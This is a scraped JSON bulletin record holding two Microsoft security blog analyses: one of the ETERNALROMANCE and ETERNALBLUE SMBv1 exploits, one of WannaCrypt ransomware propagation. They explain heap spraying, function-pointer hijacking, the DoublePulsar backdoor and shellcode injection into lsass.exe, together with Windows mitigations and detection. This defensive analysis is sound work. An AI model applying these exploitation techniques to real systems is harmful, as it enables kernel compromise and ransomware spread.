The exploit can now\u2014using carefully crafted offsets\u2014use the type _confusion out-of-bounds write_ from one object to corrupt an adjacent one.\n\nBy overwriting the ID associated with the victim object with a hardcoded number (zero), the exploit can now refer to the object without knowing what the original ID was.\n\n![Heap layout after the spray](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-heap-layout-after-spray-1024x307.png)\n\n_Figure 3. Heap layout after the spray_\n\nThe exploit proceeds to corrupt the transaction structure in a variety of ways, constructing arbitrary read-write (RW) primitives. It writes additional fields to prevent the transaction from being freed when consumed, allowing the exploit to continue reusing the same transaction for multiple requests without having to pick a new target object to corrupt.\n\n![InData pointer observed in WinDbg being overwritten by heap out-of-bounds write](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-data-pointer.png)\n\n_Figure 4. InData pointer observed in WinDbg being overwritten by heap out-of-bounds write_\n\n### Installing in-memory backdoor\n\nAt this point, the exploit code attempts to plant backdoor code inside the SMB driver. This step consists of copying shellcode into the non-paged pool, corrupting a function pointer to point to the shellcode and having that function pointer executed. Note that starting with Windows 8, SMB has moved to using non-executable pools, rendering this method ineffective on newer platforms.\n\nTo find a good spot for the function pointer, the exploit follows a pointer on the heap to reach the data segment. 
Scanning the data segment, it proceeds to look for a table of function pointers that is used to dispatch different _SMB_COM_TRANSACTION2_ subcommands to different functions.\n\nWhen it finds the table of function pointers, the exploit overwrites the 14th entry on this table, which corresponds to the _TRANS2_SESSION_SETUP_ subcommand. [MSDN documentation](<https://msdn.microsoft.com/en-us/library/ee441654.aspx>) describes this subcommand as reserved, making it an ideal candidate for triggering the backdoor as it is almost never present in SMB traffic.\n\nWhenever an SMB packet is sent with this subcommand ID to the target device, the function pointer gets executed, triggering the shellcode. This mechanism and the backdoor code are not persistent\u2014they require a persistent second-stage component to survive a reboot.\n\n![Decompiled code for planting the backdoor](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-decompiled-code-1024x889.png)\n\n_Figure 5. Decompiled code for planting the backdoor_\n\n## ETERNALBLUE SMB exploit\n\nThe WannaCrypt malware spreads by using an adapted version of the ETERNALBLUE exploit. This bug, which targets a different SMBv1 vulnerability, is a linear buffer overrun on the pool.\n\nThe bug occurs in a special case when converting a list of [extended attributes](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff545793\\(v=vs.85\\).aspx>) (EA) from one format to another. If the list contains an EA entry that goes outside the packet buffer, the list is truncated as if it only included up to the last valid entry.\n\nWhen updating the length of the list, the size is written to as if it were a 16-bit ushort, when it is actually a 32-bit ulong. This means that the upper 16-bits are not updated when the list gets truncated:\n\n![Size of list of extended attributes \\(EA\\)](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-list-truncated.png)\n\n_Figure 6. 
Size of list of extended attributes (EA)_\n\nThe code allocates a buffer with a size calculated to fit all EA entries up to the truncation. But as the list size was increased, this leads to a linear heap overflow with attacker-controlled data.\n\nIn a similar way as before, heap is sprayed but this time with _srvnet!SRVBUFFER_ objects using the SMBv2 protocol. This object contains two key pointers that they target: an [MDL](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff554414\\(v=vs.85\\).aspx>) pointer that receives network packet payload and a pointer to a _srvnet!SRVNET_CONNECTION_ object. Both pointers are overwritten so that they point to fixed addresses in the HAL region (used by the _hardware abstraction layer_).\n\nBecause of the corrupted MDL pointer, the next packet payload will get written to the HAL region. This payload contains shellcode and initializes the memory structure for a fake _srvnet!SRVNET_CONNECTION_ object. The connection object has a pointer to a srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure that contains function pointers.\n\nAfter the packet payload has been received, the _SRVNET_RECEIVE_HANDLER_ function pointer is executed from the attacker-controlled srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure, jumping to the shellcode.\n\nOn Windows 7, which is the system that the exploit targets, the HAL region is mapped as readable, writable, and executable. On newer systems the HAL region is no longer executable, meaning that the CPU would fault when trying to execute the shellcode. Furthermore, the HAL region and other kernel regions (such as page tables) have been randomized on the latest 64-bit versions of Windows 10, breaking assumptions of the 64-bit version in the ETERNALBLUE exploit.\n\n![Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-annotated-hal-region.png)\n\n_Figure 7. 
Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object_\n\n## Mitigation with virtualization-based security\n\nVirtualization-based security (VBS) provided with Device Guard on Windows 10 and kCFG enhancements with Creators Update stop common exploitation techniques, including those utilized by ETERNALROMANCE and ETERNALBLUE.\n\n### Stopping shellcode execution with W^X enforcement\n\nOn systems that have [Device Guard VBS enabled](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security>), writing and then executing shellcode\u2014such as the ETERNALROMANCE backdoor\u2014in the kernel is not possible due to W^X enforcement policies in the hypervisor. These policies ensure that a kernel memory page is never both writable and executable at any given time.\n\nEven if an attacker tries to attack page tables, the hypervisor is still able to force the _execute-disable_ bit through [extended page tables (EPT)](<https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf>). This in turn forces attackers to rely on code-reuse methods, such as return-oriented programming (ROP). As a consequence, the shellcode implant library in the Shadow Brokers release is fundamentally incompatible with VBS-protected systems.\n\n### Preventing use of corrupt function pointers with kCFG\n\nIn [Windows 10 Creators Update](<https://www.microsoft.com/en-US/windows/features>), we introduced a new security mitigation in the kernel space for VBS-enabled systems. 
The kernel is now compiled with [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (CFG)\u2014a control flow integrity solution designed to prevent common stack-pivoting techniques that rely on corrupt function pointers or C++ virtual method tables.\n\nControl Flow Guard in the compiled kernel (also known as _kCFG_) aims to verify all indirect call targets before invoking them. This makes it harder for an attacker to execute code by abusing function pointers or other indirect calls.\n\nIn the case of the ETERNALROMANCE exploit, the subverted function pointer would lead to a security fault when invoked, making the exploit non-functional in its current form. The same applies for ETERNALBLUE, which also relies on a corrupted function pointer to achieve code execution.\n\n![With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-with-kCFG-enabled.png)\n\n_Figure 8. With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr_\n\nOn early Windows 10 systems before Creators Update and without Device Guard, it is possible to attack the page tables of the HAL region to turn it executable and gain code execution using the ETERNALBLUE exploit technique.\n\n## Secure computing with Windows 10 Creators Update\n\nWhile we actively provide patches for vulnerabilities in services like SMBv1, we strive to deliver more and more system-wide mitigations that proactively protect our users from current, as well as future, exploitation and attack methods.\n\nCustomers who run Windows 10 Creators Update benefit from [Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>) and security enhancements like kCFG and W^X. 
They also benefit from a [host of other security features](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-security>) that have been strengthened with Windows 10 Creators Update, including:\n\n * [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender>) for endpoint antimalware protection powered by the Microsoft Intelligent Security Graph, which learns from [billions of devices worldwide](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>)\n * [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) enables enterprises to detect breach activity early and respond fast; try it for free with Windows 10 Enterprise\n * [Microsoft Edge](<https://www.microsoft.com/en-au/windows/microsoft-edge>) is a proven fast browser secured by virtualization and by Windows Defender SmartScreen\n\n### Reducing exposure to SMBv1 exploits on older platforms\n\nMicrosoft strongly advises customers to apply all available security updates in a timely manner. 
To reduce the attack surface on your network, block inbound SMB traffic at the firewall and, if possible, [disable the SMBv1 compatibility driver](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>).\n\n \n\n_**Viktor Brange**_ \n_ Windows Offensive Security Research Team_", "title": "Analysis of the Shadow Brokers release and mitigation with Windows 10 virtualization-based security", "cvelist": ["CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 245, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-06-30T15:02:19", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2017-06-30T15:02:19", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, 
"obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "dd7c20a69c0bda66fd3d6838cf363a04fc8491d5bedbe1f57bc9229e54c77a4b", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "4166d9c412dcd1fbbfeff20425ad5162"}, {"key": "href", "hash": "d8272541e029e5f0b1e77c3a06d01c06"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "96d5a82c7285b01222a022efcc48cebd"}, {"key": "published", "hash": "96d5a82c7285b01222a022efcc48cebd"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "b943e3715f6c77878c82e1175d6fadd2"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "MMPC:89789F73D15A0B331512F90F7E692851", "history": 
[{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "On May 12, there was a major outbreak of [WannaCrypt ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>). WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsar backdoor module leaked in April by a group calling itself Shadow Brokers.\n\nUsing ETERNALBLUE, WannaCrypt propagated as a worm on older platforms, particularly Windows 7 and Windows Server 2008 systems that haven't patched against the SMB1 vulnerability CVE-2017-0145. The resulting ransomware outbreak reached a large number of computers, even though Microsoft released security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to address the vulnerability on March 14, almost two months before the outbreak.\n\nThis post\u2014complementary to our earlier post about the [ETERNALBLUE and ETERNALROMANCE exploits released by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\u2014takes us through the WannaCrypt infection routine, providing even more detail about post-exploitation phases. It also describes other existing mitigations as well as new and upcoming mitigation and detection techniques provided by Microsoft to address similar threats.\n\n## Infection cycle\n\nThe following diagram summarizes the WannaCrypt infection cycle: initial shellcode execution, backdoor implantation and package upload, kernel and userland shellcode execution, and payload launch.\n\n![Figure 1. Infection cycle overview](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-01.-Infection-cycle-overview.png)\n\n_Figure 1. 
WannaCrypt infection cycle overview_\n\nThe file _mssecsvc.exe_ contains the main exploit code, which launches a network-level exploit and spawns the ransomware package. The exploit code targets a kernel-space vulnerability and involves multi-stage shellcode in both kernel and userland processes. Once the exploit succeeds, communication between the DoublePulsar backdoor module and _mssecsvc.exe_ is encoded using a pre-shared XOR key, allowing transmission of the main payload package and eventual execution of ransomware code.\n\n## Exploit and initial shellcodes\n\nIn an earlier [blog post](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), Viktor Brange provided a detailed analysis of the vulnerability trigger and the _instruction pointer_ control mechanism used by ETERNALBLUE. After the code achieves instruction pointer control, it focuses on acquiring persistence in kernel space using kernel shellcode and the DoublePulsar implant. It then executes the ransomware payload in user space.\n\n### Heap spray\n\nThe exploit code sprays memory on a target computer to lay out space for the first-stage shellcode. It uses non-standard SMB packet segments to make the allocated memory persistent on _hardware abstraction layer_ (HAL) memory space. It sends 18 instances of heap-spraying packets, which have direct binary representations of the first-stage shellcode.\n\n![Figure 2. Shellcode heap-spraying packet](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-02.-Shellcode-heap-spraying-packet.png)\n\n_Figure 2. Shellcode heap-spraying packet_\n\n### Initial shellcode execution: first and second stages\n\nThe exploit uses a _function-pointer overwrite _technique to direct control flow to the first-stage shellcode. This shellcode installs a second-stage shellcode as a _SYSENTER_ or _SYSCALL_ routine hook by overwriting _model-specific registers_ (MSRs). 
If the target system is x86-based, it hooks the SYSENTER routine by overwriting _IA32_SYSENTER_EIP_. On x64-based systems, it overwrites _IA32_LSTAR_ MSR to hook the SYSCALL routine. More information about these MSRs can be found in [Intel\u00ae 64 and IA-32 Architectures Software Developer's Manual Volume 3C](<https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3c-part-3-manual.pdf>).\n\n![Figure 3. First-stage shellcode for x86 systems](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-03.-First-stage-shellcode-for-x86-systems.png)\n\n_Figure 3. First-stage shellcode for x86 systems_\n\nOriginally, the IA32_SYSENTER_EIP contains the address to _nt!KiFastCallEntry_ as its SYSENTER routine.\n\n![Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-04.-Original-IA32_SYSENTER_EIP-value-pointing-to-KiFastCallEntry.png)\n\n_Figure 4. Original IA32_SYSENTER_EIP value pointing to KiFastCallEntry_\n\nAfter modification by the first-stage shellcode, IA32_SYSENTER_EIP now points to the second-stage shellcode.\n\n![Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-05.-Modified-IA32_SYSENTER_EIP-value-points-to-the-main-shellcode.png)\n\n_Figure 5. Modified IA32_SYSENTER_EIP value points to the main shellcode_\n\nThe first-stage shellcode itself runs in _DISPATCH_LEVEL_. By running the second-stage shellcode as the SYSENTER routine, the first-stage code guarantees that the second-stage shellcode runs in _PASSIVE_LEVEL_, giving it access to a broader range of kernel APIs and paged-out memory. 
And although the second-stage shellcode delivered with this malware actually doesn't access any paged pools or call APIs that require running in PASSIVE_LEVEL, this approach allows attackers to reuse the same module for more complicated shellcode.\n\n## Backdoor implantation\n\nThe second-stage shellcode, now running on the targeted computer, generates a master XOR key for uploading the payload and other communications. It uses system-specific references, like addresses of certain APIs and structures, to randomize the key.\n\n![Figure 6. Master XOR key generation](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-06.-Master-XOR-key-generation.png)\n\n_Figure 6. Master XOR key generation_\n\nThe second-stage shellcode implants DoublePulsar by patching the SMB1 _Transaction2_ dispatch table. It overwrites one of the reserved command handlers for the _SESSION_SETUP_ (0xe) subcommand of the Transaction2 request. This subcommand is reserved and not commonly used in regular code.\n\n![Figure 7. Copying packet-handler shellcode and overwriting the dispatch table](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-07.-Copying-packet-handler-shellcode-and-overwriting-the-dispatch-table.png)\n\n_Figure 7. Copying packet-handler shellcode and overwriting the dispatch table_\n\nThe following code shows the dispatch table after the subcommand backdoor is installed.\n\n![Figure 8. Substitution of 0xe command handler](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-08.-Substitution-of-0xe-command-handler.png)\n\n_Figure 8. Substitution of 0xe command handler_\n\n## Main package upload\n\nTo start uploading its main package, WannaCrypt sends multiple ping packets to the target, testing if its server hook has been installed. Remember that the second-stage shellcode runs as a _SYSENTER_ hook\u2014there is a slight delay before it runs and installs the dispatch-table backdoor. 
The response to the ping packet contains the randomly generated XOR master key to be used for communication between the client and the targeted server.\n\n![Figure 9. Code that returns original XOR key](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-09.-Code-that-returns-original-XOR-key.png)\n\n_Figure 9. Code that returns original XOR key_\n\nThis XOR key value is used only after some bit shuffling. The shuffling algorithm basically looks like the following Python code.\n\n![Figure 10. XOR bit-shuffling code](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-10a.-XOR-bit-shuffling-code.png)\n\n_Figure 10. XOR bit-shuffling code_\n\nThe upload of the encoded payload consists of multiple packets as shown below.\n\n![Figure 11. SMB Transaction2 packet showing payload upload operation](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-11a.-SMB-Transaction2-packet-showing-payload-upload-operation.png)\n\n_Figure 11. SMB Transaction2 packet showing payload upload operation_\n\nThe hooked handler code for the unimplemented subcommand processes the packet bytes, decoding them using the pre-shared XOR key. The picture above shows that the SESSION_SETUP parameter fields are used to indicate the offset and total length of the payload bytes. The data is 12 bytes long\u2014the first four bytes indicate the total length, the next four bytes are reserved, and the last four bytes are the current offset of the payload bytes in little-endian. These fields are encoded with the master XOR key.\n\nBecause the reserved field is supposed to be 0, its encoded value is simply the master XOR key itself. Going back to the packet capture above, the reserved field value is 0x38a9dbb6, which is the master XOR key. The total length is encoded as 0x38f9b8be. When this length is XORed with the master XOR key, it is 0x506308, which is the actual length of the payload bytes being uploaded. The last field is 0x38b09bb6. 
When XORed with the master key, this last field becomes 0, meaning this packet is the first packet of the payload upload.\n\nWhen all the packets are received, the packet handler in the second-stage shellcode jumps to the start of the decoded bytes.\n\n![Figure 12. Decoding and executing shellcode](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-12a.-Decoding-and-executing-shellcode.png)\n\n_Figure 12. Decoding and executing shellcode_\n\nThe transferred and decoded bytes are of size 0x50730c. As a whole, these packet bytes include kernel shellcode, userland shellcode, and the main WannaCrypt PE packages.\n\n## Executing the kernel shellcode\n\nThe kernel shellcode looks for a kernel image base and resolves essential functions by parsing PE structures. The following figure shows the APIs resolved by the shellcode:\n\n![Figure 13. Resolved kernel functions](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-13a.-Resolved-kernel-functions.png)\n\n_Figure 13. Resolved kernel functions_\n\nIt uses [_ZwAllocateVirtualMemory_](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff566416\\(v=vs.85\\).aspx>) to allocate a large chunk of RWX memory (0x506d70 in this case). This memory holds the userland shellcode and the main PE packages.\n\n![Figure 14. RWX memory allocation through ZwAllocateVirtualMemory](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-14a.-RWX-memory-allocation-through-ZwAllocateVirtualMemory.png)\n\n_Figure 14. RWX memory allocation through ZwAllocateVirtualMemory_\n\nThe kernel shellcode goes through processes on the system and injects userland shellcode to the _lsass.exe_ process using an asynchronous procedure call (APC).\n\n![Figure 15. APC routines for injecting shellcode to a thread in a userland process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-15a.-APC-routines-for-injecting-shellcode-to-a-thread-in-a-userland-process.png)\n\n_Figure 15. 
APC routines for injecting shellcode to a thread in a userland process_\n\n## Userland shellcode\u2014the start of a new infection cycle\n\nAfter multiple calls to [_VirtualProtect_](<https://msdn.microsoft.com/en-us/library/windows/desktop/aa366898\\(v=vs.85\\).aspx>) and PE layout operations, the shellcode loads a bootstrap DLL using a reflective DLL loading method. The WannaCrypt user-mode component contains this bootstrap DLL for both 64- and 32-bit Windows.\n\n![Figure 16. Bootstrap DLL functions](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-16c.-Bootstrap-DLL-functions.png)\n\n_Figure 16. Bootstrap DLL functions_\n\nThis bootstrap DLL reads the main WannaCrypt payload from the resource section and writes it to a file _C:\\WINDOWS\\mssecsvc.exe_. It then launches the file using the [_CreateProcess_](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms682425\\(v=vs.85\\).aspx>) API. At this stage, a new infection cycle is started on the newly infected computer.\n\n \n\n![Figure 17. Dropping main payload to file system](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-17a.-Dropping-main-payload-to-file-system.png)\n\n_Figure 17. Dropping main payload to file system_\n\n![Figure 18. Creating the main payload process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-18a.-Creating-the-main-payload-process.png)\n\n_Figure 18. Creating the main payload process_\n\n## Mitigating and detecting WannaCrypt\n\nWannaCrypt borrowed most of its attack code from those leaked by Shadow Brokers, specifically the ETERNALBLUE kernel exploit code and the DoublePulsar kernel-level backdoor. It leverages DoublePulsar's code execution mechanisms and _asynchronous procedure calls_ (APCs) at the kernel to deliver its main infection package and ransomware payload. 
It also uses the system file _lsass.exe_ as its injection target.\n\n### Mitigation on newer platforms and upcoming SMB updates\n\nThe ETERNALBLUE exploit code worked only on older OSes like Windows 7 and Windows Server 2008, particularly those that have _not_ applied security updates released with security bulletin [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). The exploit was limited to these platforms because it depended on executable memory allocated in kernel HAL space. Since Windows 8 and Windows Server 2012, HAL memory has stopped being executable. Also, for additional protection, predictable addresses in HAL memory space have been randomized since Windows 10 Creators Update.\n\nWith the upcoming Windows 10 Fall Creators Update (also known as RS3), many dispatch tables in legacy SMB1 drivers, including the _Transaction2_ dispatch table (_SrvTransaction2DispatchTable_) memory area, will be set to read-only as a defense-in-depth measure. The backdoor mechanism described here will be much less attractive to attackers because the mechanism will require additional exploit techniques for unlocking the memory area and overwriting function pointers. Furthermore, SMB1 has already been deprecated for years. With the RS3 releases for Windows 10 and Windows Server 2016, [SMB1 will be disabled](<https://blogs.technet.microsoft.com/filecab/2017/06/01/smb1-product-clearinghouse/>).\n\n### Hyper Guard virtualization-based security\n\nWannaCrypt employs multiple techniques to achieve full code execution on target systems. The IA32_SYSENTER_EIP modification technique used by WannaCrypt to run the main shellcode is actually commonly observed when kernel rootkits try to hook system calls. [_Kernel Patch Protection_](<https://blogs.msdn.microsoft.com/windowsvistasecurity/2006/08/12/an-introduction-to-kernel-patch-protection/>) (or PatchGuard) typically detects this technique by periodically checking for modifications of MSR values. 
WannaCrypt hooking, however, is too brief for PatchGuard to fire. Windows 10, armed with virtualization-based security (VBS) technologies such as [_Hyper Guard_](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>), can detect and mitigate this technique because it fires as soon as the malicious _wrmsr_ instruction to modify the MSR is executed.\n\n_To enable Hyper Guard on systems with supported processors, use Secure Boot and _[_enable Device Guard_](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>)_. Use the _[_hardware readiness tool_](<https://www.microsoft.com/en-us/download/details.aspx?id=53337>)_ to check if your hardware system supports Device Guard. Device Guard runs on the Enterprise and Education editions of Windows 10._\n\n### Post-breach detection with Windows Defender ATP\n\nIn addition to VBS mitigation provided with Hyper Guard, [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) (Windows Defender ATP) can detect injection of code to userland processes, including the method used by WannaCrypt. Our researchers have also added new detection logic so that Windows Defender ATP flags highly unusual events that involve spawning of processes from _lsass.exe_.\n\n![Figure 19. Windows Defender ATP detection of an anomalous process spawned from a system process](https://msdnshared.blob.core.windows.net/media/2017/06/Figure-19a.-Windows-Defender-ATP-detection-of-an-anomalous-process-spawned-from-a-system-process.png)\n\n_Figure 19. 
Windows Defender ATP detection of an anomalous process spawned from a system process_\n\nWhile the detection mechanism for process spawning was pushed out in response to WannaCrypt, this mechanism and detection of code injection activities also enable Windows Defender ATP customers to uncover sophisticated breaches that leverage similar attack methods.\n\n**Matt Oh** \n_Windows Defender ATP Research Team_", "enchantments": {}, "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/", "id": "MMPC:89789F73D15A0B331512F90F7E692851", "lastseen": "2017-06-30T16:02:27", "modified": "2017-06-30T13:00:00", "objectVersion": "1.4", "published": "2017-06-30T13:00:00", "references": [], "reporter": "msft-mmpc", "title": "Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation", "type": "mmpc", "viewCount": 38}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-06-30T16:02:27"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "_(Note: Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security 